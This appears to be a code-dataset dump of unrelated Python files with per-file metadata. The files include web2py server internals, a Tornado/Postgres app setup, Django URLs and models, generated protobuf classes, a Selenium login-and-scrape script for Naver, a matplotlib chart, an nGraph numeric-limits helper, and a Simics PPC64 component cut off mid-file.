if not global_settings.local_hosts: local_hosts = set(['127.0.0.1', '::ffff:127.0.0.1', '::1']) if not global_settings.web2py_runtime_gae: try: fqdn = socket.getfqdn() local_hosts.add(socket.gethostname()) local_hosts.add(fqdn) local_hosts.update([ addrinfo[4][0] for addrinfo in getipaddrinfo(fqdn)]) if env.server_name: local_hosts.add(env.server_name) local_hosts.update([ addrinfo[4][0] for addrinfo in getipaddrinfo(env.server_name)]) except (socket.gaierror, TypeError): pass global_settings.local_hosts = list(local_hosts) else: local_hosts = global_settings.local_hosts client = get_client(env) x_req_with = str(env.http_x_requested_with).lower() cmd_opts = global_settings.cmd_options request.update( client = client, folder = abspath('applications', app) + os.sep, ajax = x_req_with == 'xmlhttprequest', cid = env.http_web2py_component_element, is_local = (env.remote_addr in local_hosts and client == env.remote_addr), is_shell = False, is_scheduler = False, is_https = env.wsgi_url_scheme in HTTPS_SCHEMES or \ request.env.http_x_forwarded_proto in HTTPS_SCHEMES \ or env.https == 'on' ) request.url = environ['PATH_INFO'] # ################################################## # access the requested application # ################################################## disabled = pjoin(request.folder, 'DISABLED') if not exists(request.folder): if app == rwthread.routes.default_application \ and app != 'welcome': redirect(URL('welcome', 'default', 'index')) elif rwthread.routes.error_handler: _handler = rwthread.routes.error_handler redirect(URL(_handler['application'], _handler['controller'], _handler['function'], args=app)) else: raise HTTP(404, rwthread.routes.error_message % 'invalid request', web2py_error='invalid application') elif not request.is_local and exists(disabled): five0three = os.path.join(request.folder,'static','503.html') if os.path.exists(five0three): raise HTTP(503, file(five0three, 'r').read()) else: raise HTTP(503, "<html><body><h1>Temporarily down for 
maintenance</h1></body></html>") # ################################################## # build missing folders # ################################################## create_missing_app_folders(request) # ################################################## # get the GET and POST data # ################################################## #parse_get_post_vars(request, environ) # ################################################## # expose wsgi hooks for convenience # ################################################## request.wsgi = LazyWSGI(environ, request, response) # ################################################## # load cookies # ################################################## if env.http_cookie: for single_cookie in env.http_cookie.split(';'): single_cookie = single_cookie.strip() if single_cookie: try: request.cookies.load(single_cookie) except Cookie.CookieError: pass # single invalid cookie ignore # ################################################## # try load session or create new session file # ################################################## if not env.web2py_disable_session: session.connect(request, response) # ################################################## # run controller # ################################################## if global_settings.debugging and app != "admin": import gluon.debug # activate the debugger gluon.debug.dbg.do_debug(mainpyfile=request.folder) serve_controller(request, response, session) except HTTP as hr: http_response = hr if static_file: return http_response.to(responder, env=env) if request.body: request.body.close() if hasattr(current, 'request'): # ################################################## # on success, try store session in database # ################################################## if not env.web2py_disable_session: session._try_store_in_db(request, response) # ################################################## # on success, commit database # ################################################## if 
response.do_not_commit is True: BaseAdapter.close_all_instances(None) elif response.custom_commit: BaseAdapter.close_all_instances(response.custom_commit) else: BaseAdapter.close_all_instances('commit') # ################################################## # if session not in db try store session on filesystem # this must be done after trying to commit database! # ################################################## if not env.web2py_disable_session: session._try_store_in_cookie_or_file(request, response) # Set header so client can distinguish component requests. if request.cid: http_response.headers.setdefault( 'web2py-component-content', 'replace') if request.ajax: if response.flash: http_response.headers['web2py-component-flash'] = \ urllib2.quote(xmlescape(response.flash).replace(b'\n', b'')) if response.js: http_response.headers['web2py-component-command'] = \ urllib2.quote(response.js.replace('\n', '')) # ################################################## # store cookies in headers # ################################################## session._fixup_before_save() http_response.cookies2headers(response.cookies) ticket = None except RestrictedError as e: if request.body: request.body.close() # ################################################## # on application error, rollback database # ################################################## # log tickets before rollback if not in DB if not request.tickets_db: ticket = e.log(request) or 'unknown' # rollback if response._custom_rollback: response._custom_rollback() else: BaseAdapter.close_all_instances('rollback') # if tickets in db, reconnect and store it in db if request.tickets_db: ticket = e.log(request) or 'unknown' http_response = \ HTTP(500, rwthread.routes.error_message_ticket % dict(ticket=ticket), web2py_error='ticket %s' % ticket) except: if request.body: request.body.close() # ################################################## # on application error, rollback database # 
################################################## try: if response._custom_rollback: response._custom_rollback() else: BaseAdapter.close_all_instances('rollback') except: pass e = RestrictedError('Framework', '', '', locals()) ticket = e.log(request) or 'unrecoverable' http_response = \ HTTP(500, rwthread.routes.error_message_ticket % dict(ticket=ticket), web2py_error='ticket %s' % ticket) finally: if response and hasattr(response, 'session_file') \ and response.session_file: response.session_file.close() session._unlock(response) http_response, new_environ = try_rewrite_on_error( http_response, request, environ, ticket) if not http_response: return wsgibase(new_environ, responder) if global_settings.web2py_crontype == 'soft': newcron.softcron(global_settings.applications_parent).start() return http_response.to(responder, env=env) def save_password(password, port): """ Used by main() to save the password in the parameters_port.py file. """ password_file = abspath('parameters_%i.py' % port) if password == '<random>': # make up a new password chars = string.letters + string.digits password = ''.join([random.choice(chars) for _ in range(8)]) cpassword = CRYPT()(password)[0] print('******************* IMPORTANT!!! 
************************') print('your admin password is "%s"' % password) print('*********************************************************') elif password == '<recycle>': # reuse the current password if any if exists(password_file): return else: password = '' elif password.startswith('<pam_user:'): # use the pam password for specified user cpassword = password[1:-1] else: # use provided password cpassword = CRYPT()(password)[0] fp = open(password_file, 'w') if password: fp.write('password="%s"\n' % cpassword) else: fp.write('password=None\n') fp.close() def appfactory(wsgiapp=wsgibase, logfilename='httpserver.log', profiler_dir=None, profilerfilename=None): """ generates a wsgi application that does logging and profiling and calls wsgibase Args: wsgiapp: the base application logfilename: where to store apache-compatible requests log profiler_dir: where to store profile files """ if profilerfilename is not None: raise BaseException("Deprecated API") if profiler_dir: profiler_dir = abspath(profiler_dir) logger.warn('profiler is on. 
will use dir %s', profiler_dir) if not os.path.isdir(profiler_dir): try: os.makedirs(profiler_dir) except: raise BaseException("Can't create dir %s" % profiler_dir) filepath = pjoin(profiler_dir, 'wtest') try: filehandle = open( filepath, 'w' ) filehandle.close() os.unlink(filepath) except IOError: raise BaseException("Unable to write to dir %s" % profiler_dir) def app_with_logging(environ, responder): """ a wsgi app that does logging and profiling and calls wsgibase """ status_headers = [] def responder2(s, h): """ wsgi responder app """ status_headers.append(s) status_headers.append(h) return responder(s, h) time_in = time.time() ret = [0] if not profiler_dir: ret[0] = wsgiapp(environ, responder2) else: import cProfile prof = cProfile.Profile() prof.enable() ret[0] = wsgiapp(environ, responder2) prof.disable() destfile = pjoin(profiler_dir, "req_%s.prof" % web2py_uuid()) prof.dump_stats(destfile) try: line = '%s, %s, %s, %s, %s, %s, %f\n' % ( environ['REMOTE_ADDR'], datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), environ['REQUEST_METHOD'], environ['PATH_INFO'].replace(',', '%2C'), environ['SERVER_PROTOCOL'], (status_headers[0])[:3], time.time() - time_in, ) if not logfilename: sys.stdout.write(line) elif isinstance(logfilename, str): write_file(logfilename, line, 'a') else: logfilename.write(line) except: pass return ret[0] return app_with_logging class HttpServer(object): """ the web2py web server (Rocket) """ def __init__( self, ip='127.0.0.1', port=8000, password='', pid_filename='httpserver.pid', log_filename='httpserver.log', profiler_dir=None, ssl_certificate=None, ssl_private_key=None, ssl_ca_certificate=None, min_threads=None, max_threads=None, server_name=None, request_queue_size=5, timeout=10, socket_timeout=1, shutdown_timeout=None, # Rocket does not use a shutdown timeout path=None, interfaces=None # Rocket is able to use several interfaces - must be list of socket-tuples as string ): """ starts the web server. 
""" if interfaces: # if interfaces is specified, it must be tested for rocket parameter correctness # not necessarily completely tested (e.g. content of tuples or ip-format) import types if isinstance(interfaces, list): for i in interfaces: if not isinstance(i, tuple): raise "Wrong format for rocket interfaces parameter - see http://packages.python.org/rocket/" else: raise "Wrong format for rocket interfaces parameter - see http://packages.python.org/rocket/" if path: # if a path is specified change the global variables so that web2py # runs from there instead of cwd or os.environ['web2py_path'] global web2py_path path = os.path.normpath(path) web2py_path = path global_settings.applications_parent = path os.chdir(path) load_routes() for p in (path, abspath('site-packages'), ""): add_path_first(p) if exists("logging.conf"): logging.config.fileConfig("logging.conf") save_password(password, port) self.pid_filename = pid_filename if not server_name: server_name = socket.gethostname() logger.info('starting web server...') rocket.SERVER_NAME = server_name rocket.SOCKET_TIMEOUT = socket_timeout sock_list = [ip, port] if not ssl_certificate or not ssl_private_key: logger.info('SSL is off') elif not rocket.ssl: logger.warning('Python "ssl" module unavailable. SSL is OFF') elif not exists(ssl_certificate): logger.warning('unable to open SSL certificate. SSL is OFF') elif not exists(ssl_private_key): logger.warning('unable to open SSL private key. 
SSL is OFF') else: sock_list.extend([ssl_private_key, ssl_certificate]) if ssl_ca_certificate: sock_list.append(ssl_ca_certificate) logger.info('SSL is ON') app_info = {'wsgi_app': appfactory(wsgibase, log_filename, profiler_dir)} self.server = rocket.Rocket(interfaces or tuple(sock_list), method='wsgi', app_info=app_info, min_threads=min_threads, max_threads=max_threads, queue_size=int(request_queue_size), timeout=int(timeout), handle_signals=False, ) def start(self): """ start the web server """ try: signal.signal(signal.SIGTERM, lambda a, b, s=self: s.stop()) signal.signal(signal.SIGINT, lambda a, b, s=self: s.stop()) except: pass write_file(self.pid_filename, str(os.getpid())) self.server.start() def stop(self, stoplogging=False): """ stop cron and the web server """ newcron.stopcron() self.server.stop(stoplogging) try: os.unlink(self.pid_filename) except: pass
37.919598
117
0.52286
2,993
30,184
5.130638
0.213498
0.006187
0.006512
0.001954
0.133498
0.102631
0.086806
0.065642
0.060042
0.054572
0
0.009227
0.332163
30,184
795
118
37.967296
0.752555
0.190465
0
0.173554
0
0.004132
0.082748
0.010462
0
0
0
0
0
1
0.035124
false
0.051653
0.082645
0.002066
0.152893
0.008264
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5d96fee6a1d130e8653363f3a24275073276610b
1,496
py
Python
app/__init__.py
dulin/tornado-test
8ceeb9f2b50b4cd0f18baa9149140721feec1925
[ "MIT" ]
null
null
null
app/__init__.py
dulin/tornado-test
8ceeb9f2b50b4cd0f18baa9149140721feec1925
[ "MIT" ]
null
null
null
app/__init__.py
dulin/tornado-test
8ceeb9f2b50b4cd0f18baa9149140721feec1925
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- # -*- mode: python -*- import aiopg import psycopg2 import tornado.locks from tornado.options import define, options from tornado.web import Application from app.application import Application define('port', default=8080, help="listening port") define('bind_address', default="", help="bind address") define("db_host", default="127.0.0.1", help="database host") define("db_port", default=5432, help="database port") define("db_database", default="tornado", help="database name") define("db_user", default="tornado", help="database user") define("db_password", default="tornado", help="database password") async def maybe_create_tables(db): try: with (await db.cursor()) as cur: await cur.execute("SELECT COUNT(*) FROM schema LIMIT 1") await cur.fetchone() except psycopg2.ProgrammingError: print("Database error!") async def main(): options.parse_command_line() async with aiopg.create_pool( host=options.db_host, port=options.db_port, user=options.db_user, password=options.db_password, dbname=options.db_database) as db: await maybe_create_tables(db) app = Application(db) app.listen(options.port, options.bind_address, xheaders=True) print("Listening on http://%s:%i" % (options.bind_address, options.port)) shutdown_event = tornado.locks.Event() await shutdown_event.wait()
32.521739
81
0.675802
191
1,496
5.17801
0.382199
0.040445
0.054601
0.078868
0
0
0
0
0
0
0
0.014876
0.191176
1,496
45
82
33.244444
0.802479
0.042112
0
0
0
0
0.181119
0
0
0
0
0
0
1
0
false
0.058824
0.176471
0
0.176471
0.058824
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5d99e63583440bf3da1b852644d47a0c0ec5d4a3
349
py
Python
src/project/api/rankings/urls.py
jSkrod/djangae-react-browser-games-app
28c5064f0a126021afb08b195839305aba6b35a2
[ "CC-BY-4.0", "MIT" ]
null
null
null
src/project/api/rankings/urls.py
jSkrod/djangae-react-browser-games-app
28c5064f0a126021afb08b195839305aba6b35a2
[ "CC-BY-4.0", "MIT" ]
null
null
null
src/project/api/rankings/urls.py
jSkrod/djangae-react-browser-games-app
28c5064f0a126021afb08b195839305aba6b35a2
[ "CC-BY-4.0", "MIT" ]
null
null
null
from django.conf.urls import url, include from project.api.rankings.api import AddRanking, AddScore, GetScoresUser, GetScoresGame urlpatterns = [ url(r'add_ranking$', AddRanking.as_view()), url(r'add_score$', AddScore.as_view()), url(r'get_scores_game$', GetScoresGame.as_view()), url(r'get_scores_user$', GetScoresUser.as_view()) ]
38.777778
87
0.739255
48
349
5.166667
0.520833
0.064516
0.108871
0.120968
0.153226
0.153226
0
0
0
0
0
0
0.114613
349
9
88
38.777778
0.802589
0
0
0
0
0
0.154286
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5d9a69d3f7389d018e9e0d4577b31c493762c8e2
4,895
py
Python
ThirdParty/protobuf-registry/python/protobufs/services/feature/actions/get_flags_pb2.py
getcircle/luno-ios
d18260abb537496d86cf607c170dd5e91c406f0f
[ "MIT" ]
null
null
null
ThirdParty/protobuf-registry/python/protobufs/services/feature/actions/get_flags_pb2.py
getcircle/luno-ios
d18260abb537496d86cf607c170dd5e91c406f0f
[ "MIT" ]
null
null
null
ThirdParty/protobuf-registry/python/protobufs/services/feature/actions/get_flags_pb2.py
getcircle/luno-ios
d18260abb537496d86cf607c170dd5e91c406f0f
[ "MIT" ]
null
null
null
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: protobufs/services/feature/actions/get_flags.proto from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='protobufs/services/feature/actions/get_flags.proto', package='services.feature.actions.get_flags', syntax='proto3', serialized_pb=b'\n2protobufs/services/feature/actions/get_flags.proto\x12\"services.feature.actions.get_flags\"\x0b\n\tRequestV1\"\x84\x01\n\nResponseV1\x12H\n\x05\x66lags\x18\x01 \x03(\x0b\x32\x39.services.feature.actions.get_flags.ResponseV1.FlagsEntry\x1a,\n\nFlagsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\x08:\x02\x38\x01\x62\x06proto3' ) _sym_db.RegisterFileDescriptor(DESCRIPTOR) _REQUESTV1 = _descriptor.Descriptor( name='RequestV1', full_name='services.feature.actions.get_flags.RequestV1', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=90, serialized_end=101, ) _RESPONSEV1_FLAGSENTRY = _descriptor.Descriptor( name='FlagsEntry', full_name='services.feature.actions.get_flags.ResponseV1.FlagsEntry', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='key', full_name='services.feature.actions.get_flags.ResponseV1.FlagsEntry.key', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='value', 
full_name='services.feature.actions.get_flags.ResponseV1.FlagsEntry.value', index=1, number=2, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), b'8\001'), is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=192, serialized_end=236, ) _RESPONSEV1 = _descriptor.Descriptor( name='ResponseV1', full_name='services.feature.actions.get_flags.ResponseV1', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='flags', full_name='services.feature.actions.get_flags.ResponseV1.flags', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[_RESPONSEV1_FLAGSENTRY, ], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=104, serialized_end=236, ) _RESPONSEV1_FLAGSENTRY.containing_type = _RESPONSEV1 _RESPONSEV1.fields_by_name['flags'].message_type = _RESPONSEV1_FLAGSENTRY DESCRIPTOR.message_types_by_name['RequestV1'] = _REQUESTV1 DESCRIPTOR.message_types_by_name['ResponseV1'] = _RESPONSEV1 RequestV1 = _reflection.GeneratedProtocolMessageType('RequestV1', (_message.Message,), dict( DESCRIPTOR = _REQUESTV1, __module__ = 'protobufs.services.feature.actions.get_flags_pb2' # @@protoc_insertion_point(class_scope:services.feature.actions.get_flags.RequestV1) )) _sym_db.RegisterMessage(RequestV1) ResponseV1 = _reflection.GeneratedProtocolMessageType('ResponseV1', (_message.Message,), dict( FlagsEntry = _reflection.GeneratedProtocolMessageType('FlagsEntry', (_message.Message,), dict( DESCRIPTOR = 
_RESPONSEV1_FLAGSENTRY, __module__ = 'protobufs.services.feature.actions.get_flags_pb2' # @@protoc_insertion_point(class_scope:services.feature.actions.get_flags.ResponseV1.FlagsEntry) )) , DESCRIPTOR = _RESPONSEV1, __module__ = 'protobufs.services.feature.actions.get_flags_pb2' # @@protoc_insertion_point(class_scope:services.feature.actions.get_flags.ResponseV1) )) _sym_db.RegisterMessage(ResponseV1) _sym_db.RegisterMessage(ResponseV1.FlagsEntry) _RESPONSEV1_FLAGSENTRY.has_options = True _RESPONSEV1_FLAGSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), b'8\001') # @@protoc_insertion_point(module_scope)
32.852349
371
0.765475
582
4,895
6.139175
0.218213
0.075567
0.110831
0.125945
0.600616
0.52281
0.490624
0.438567
0.376434
0.293591
0
0.034761
0.112564
4,895
148
372
33.074324
0.787753
0.091931
0
0.54918
1
0.008197
0.23259
0.201713
0
0
0
0
0
1
0
false
0
0.040984
0
0.040984
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5da0ff4d3e7dbb3fe7c21095720798fb7df7ef6b
742
py
Python
02/selenium.02.py
study-machine-learning/dongheon.shin
6103ef9c73b162603bc39a27e4ecca0f1ac35e57
[ "MIT" ]
2
2017-09-24T02:29:48.000Z
2017-10-05T11:15:22.000Z
02/selenium.02.py
study-machine-learning/dongheon.shin
6103ef9c73b162603bc39a27e4ecca0f1ac35e57
[ "MIT" ]
null
null
null
02/selenium.02.py
study-machine-learning/dongheon.shin
6103ef9c73b162603bc39a27e4ecca0f1ac35e57
[ "MIT" ]
null
null
null
from selenium import webdriver username = "henlix" password = "my_password" browser = webdriver.PhantomJS() browser.implicitly_wait(5) url_login = "https://nid.naver.com/nidlogin.login" browser.get(url_login) el = browser.find_element_by_id("id") el.clear() el.send_keys(username) el = browser.find_element_by_id("pw") el.clear() el.send_keys(password) form = browser.find_element_by_css_selector("input.btn_global[type=submit]") form.submit() url_shopping_list = "https://order.pay.naver.com/home?tabMenu=SHOPPING" browser.get(url_shopping_list) products = browser.find_elements_by_css_selector(".p_info span") for product in products: print("- ", product.text) # PYTHONIOENCODING=utf-8:surrogateescape python3 selenium.02.py
22.484848
76
0.777628
109
742
5.055046
0.559633
0.079855
0.098004
0.108893
0.14882
0.087114
0
0
0
0
0
0.007396
0.088949
742
32
77
23.1875
0.807692
0.08221
0
0.1
0
0
0.21944
0.04271
0
0
0
0
0
1
0
false
0.1
0.05
0
0.05
0.05
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
5da246d54547ba7b297b610234129f3853586daf
343
py
Python
visualization/matplotlib/barwitherror.py
Licas/datascienceexamples
cbb1293dbae875cb3f166dbde00b2ab629a43ece
[ "MIT" ]
null
null
null
visualization/matplotlib/barwitherror.py
Licas/datascienceexamples
cbb1293dbae875cb3f166dbde00b2ab629a43ece
[ "MIT" ]
null
null
null
visualization/matplotlib/barwitherror.py
Licas/datascienceexamples
cbb1293dbae875cb3f166dbde00b2ab629a43ece
[ "MIT" ]
null
null
null
from matplotlib import pyplot as plt drinks = ["cappuccino", "latte", "chai", "americano", "mocha", "espresso"] ounces_of_milk = [6, 9, 4, 0, 9, 0] error = [0.6, 0.9, 0.4, 0, 0.9, 0] #Yerr -> element at i position represents +/- error[i] variance on bar[i] value plt.bar( range(len(drinks)),ounces_of_milk, yerr=error, capsize=15) plt.show()
38.111111
79
0.667638
60
343
3.75
0.6
0.026667
0.04
0
0
0
0
0
0
0
0
0.061224
0.142857
343
9
80
38.111111
0.704082
0.227405
0
0
0
0
0.154717
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.166667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5da69a858193b1623616f277374a6ced50dc8b34
352
py
Python
tests_app/tests/functional/key_constructor/bits/models.py
maryokhin/drf-extensions
8223db2bdddaf3cd99f951b2291210c5fd5b0e6f
[ "MIT" ]
1
2019-06-18T16:40:33.000Z
2019-06-18T16:40:33.000Z
tests_app/tests/functional/key_constructor/bits/models.py
maryokhin/drf-extensions
8223db2bdddaf3cd99f951b2291210c5fd5b0e6f
[ "MIT" ]
null
null
null
tests_app/tests/functional/key_constructor/bits/models.py
maryokhin/drf-extensions
8223db2bdddaf3cd99f951b2291210c5fd5b0e6f
[ "MIT" ]
1
2018-07-17T00:13:19.000Z
2018-07-17T00:13:19.000Z
# -*- coding: utf-8 -*- from django.db import models class KeyConstructorUserProperty(models.Model): name = models.CharField(max_length=100) class Meta: app_label = 'tests_app' class KeyConstructorUserModel(models.Model): property = models.ForeignKey(KeyConstructorUserProperty) class Meta: app_label = 'tests_app'
22
60
0.713068
38
352
6.473684
0.605263
0.089431
0.097561
0.138211
0.203252
0.203252
0
0
0
0
0
0.013986
0.1875
352
16
61
22
0.846154
0.059659
0
0.444444
0
0
0.054545
0
0
0
0
0
0
1
0
false
0
0.111111
0
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
5da7c35c6f555424a35c54ce0dd94e20ac56d5b8
4,116
py
Python
ngraph_onnx/onnx_importer/utils/numeric_limits.py
cliveseldon/ngraph-onnx
a2d20afdc7acd5064e4717612ad372d864d03d3d
[ "Apache-2.0" ]
null
null
null
ngraph_onnx/onnx_importer/utils/numeric_limits.py
cliveseldon/ngraph-onnx
a2d20afdc7acd5064e4717612ad372d864d03d3d
[ "Apache-2.0" ]
null
null
null
ngraph_onnx/onnx_importer/utils/numeric_limits.py
cliveseldon/ngraph-onnx
a2d20afdc7acd5064e4717612ad372d864d03d3d
[ "Apache-2.0" ]
null
null
null
# ****************************************************************************** # Copyright 2018 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ****************************************************************************** from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import numpy as np import numbers from typing import Union class NumericLimits(object): """Class providing interface to extract numerical limits for given data type.""" @staticmethod def _get_number_limits_class(dtype): # type: (np.dtype) -> Union[IntegralLimits, FloatingPointLimits] """Return specialized class instance with limits set for given data type. :param dtype: The data type we want to check limits for. :return: The specialized class instance providing numeric limits. """ data_type = dtype.type value = data_type(1) if isinstance(value, numbers.Integral): return IntegralLimits(data_type) elif isinstance(value, numbers.Real): return FloatingPointLimits(data_type) else: raise ValueError('NumericLimits: unsupported data type: <{}>.'.format(dtype.type)) @staticmethod def _get_dtype(dtype): # type: (Union[np.dtype, int, float]) -> np.dtype """Return numpy dtype object wrapping provided data type. :param dtype: The data type to be wrapped. :return: The numpy dtype object. 
""" return dtype if isinstance(dtype, np.dtype) else np.dtype(dtype) @classmethod def max(cls, dtype): # type: (np.dtype) -> Union[int, float] """Return maximum value that can be represented in given data type. :param dtype: The data type we want to check maximum value for. :return: The maximum value. """ return cls._get_number_limits_class(cls._get_dtype(dtype)).max @classmethod def min(cls, dtype): # type: (np.dtype) -> Union[int, float] """Return minimum value that can be represented in given data type. :param dtype: The data type we want to check minimum value for. :return: The minimum value. """ return cls._get_number_limits_class(cls._get_dtype(dtype)).min class FloatingPointLimits(object): """Class providing access to numeric limits for floating point data types.""" def __init__(self, data_type): # type: (type) -> None self.data_type = data_type @property def max(self): # type: () -> float """Provide maximum representable value by stored data type. :return: The maximum value. """ return np.finfo(self.data_type).max @property def min(self): # type: () -> float """Provide minimum representable value by stored data type. :return: The minimum value. """ return np.finfo(self.data_type).min class IntegralLimits(object): """Class providing access to numeric limits for integral data types.""" def __init__(self, data_type): # type: (type) -> None self.data_type = data_type @property def max(self): # type: () -> int """Provide maximum representable value by stored data type. :return: The maximum value. """ return np.iinfo(self.data_type).max @property def min(self): # type: () -> int """Provide minimum representable value by stored data type. :return: The minimum value. """ return np.iinfo(self.data_type).min
34.588235
94
0.640671
508
4,116
5.074803
0.283465
0.086889
0.037238
0.027929
0.438712
0.418154
0.418154
0.389837
0.355702
0.297517
0
0.002854
0.233722
4,116
118
95
34.881356
0.814521
0.536929
0
0.355556
0
0
0.025935
0
0
0
0
0
0
1
0.222222
false
0
0.155556
0
0.644444
0.022222
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5da8c5b2385d6f73170c02cb6de27d3641c827fa
6,653
py
Python
amd64-linux/lib/ppc64_simple_components.py
qiyancos/Simics-3.0.31
9bd52d5abad023ee87a37306382a338abf7885f1
[ "BSD-4-Clause", "FSFAP" ]
1
2020-06-15T10:41:18.000Z
2020-06-15T10:41:18.000Z
amd64-linux/lib/ppc64_simple_components.py
qiyancos/Simics-3.0.31
9bd52d5abad023ee87a37306382a338abf7885f1
[ "BSD-4-Clause", "FSFAP" ]
null
null
null
amd64-linux/lib/ppc64_simple_components.py
qiyancos/Simics-3.0.31
9bd52d5abad023ee87a37306382a338abf7885f1
[ "BSD-4-Clause", "FSFAP" ]
3
2020-08-10T10:25:02.000Z
2021-09-12T01:12:09.000Z
## Copyright 2005-2007 Virtutech AB ## ## The contents herein are Source Code which are a subset of Licensed ## Software pursuant to the terms of the Virtutech Simics Software ## License Agreement (the "Agreement"), and are being distributed under ## the Agreement. You should have received a copy of the Agreement with ## this Licensed Software; if not, please contact Virtutech for a copy ## of the Agreement prior to using this Licensed Software. ## ## By using this Source Code, you agree to be bound by all of the terms ## of the Agreement, and use of this Source Code is subject to the terms ## the Agreement. ## ## This Source Code and any derivatives thereof are provided on an "as ## is" basis. Virtutech makes no warranties with respect to the Source ## Code or any derivatives thereof and disclaims all implied warranties, ## including, without limitation, warranties of merchantability and ## fitness for a particular purpose and non-infringement. from sim_core import * from components import * import time # Generic Simple System for PPC64 Processors class ppc64_simple_base_component(component_object): basename = 'system' connectors = { 'uart0' : {'type' : 'serial', 'direction' : 'down', 'empty_ok' : True, 'hotplug' : True, 'multi' : False}, 'uart1' : {'type' : 'serial', 'direction' : 'down', 'empty_ok' : True, 'hotplug' : True, 'multi' : False}} def __init__(self, parse_obj): component_object.__init__(self, parse_obj) self.o.cpu = [] self.map_offset = 0xf0000000 self.time_of_day = "2006-06-06 06:06:06 UTC" def get_cpu_frequency(self, idx): return self.freq_mhz def set_cpu_frequency(self, val, idx): if self.obj.configured: return Sim_Set_Illegal_Value self.freq_mhz = val return Sim_Set_Ok def get_memory_megs(self, idx): return self.memory_megs def set_memory_megs(self, val, idx): if self.obj.configured: return Sim_Set_Illegal_Value self.memory_megs = val return Sim_Set_Ok def get_map_offset(self, idx): return self.map_offset def set_map_offset(self, val, idx): if 
self.obj.configured: return Sim_Set_Illegal_Value self.map_offset = val return Sim_Set_Ok def get_time_of_day(self, idx): return self.time_of_day def set_time_of_day(self, val, idx): if self.obj.configured: return Sim_Set_Illegal_Value try: time.strptime(val, "%Y-%m-%d %H:%M:%S %Z") except Exception, msg: SIM_attribute_error(str(msg)) return Sim_Set_Illegal_Value self.time_of_day = val return Sim_Set_Ok def add_objects(self, cpu): self.o.phys_mem = pre_obj('phys_mem', 'memory-space') self.o.ram_image = pre_obj('memory_image', 'image') self.o.ram_image.size = self.memory_megs * 0x100000 self.o.ram = pre_obj('memory', 'ram') self.o.ram.image = self.o.ram_image self.o.pic = pre_obj('pic$', 'open-pic') self.o.pic.irq_devs = [cpu] self.o.irq = pre_obj('irq$', 'i8259x2') self.o.irq.irq_dev = self.o.pic self.o.uart0 = pre_obj('uart0', 'NS16550') self.o.uart0.irq_dev = self.o.irq self.o.uart0.irq_level = 4 self.o.uart0.xmit_time = 1000 self.o.uart1 = pre_obj('uart1', 'NS16550') self.o.uart1.irq_dev = self.o.irq self.o.uart1.irq_level = 3 self.o.uart1.xmit_time = 1000 self.o.of = pre_obj('of', 'ppc-of') self.o.of.cpu = self.o.cpu[0] self.o.of.memory_megs = self.memory_megs self.o.of.entry_point = 0x7000000 self.o.of.map_offset = self.map_offset self.o.of.time_of_day = self.time_of_day self.o.broadcast_bus = pre_obj('broadcast_bus', 'ppc-broadcast-bus') self.o.empty = pre_obj('empty', 'empty-device') self.o.pci_io = 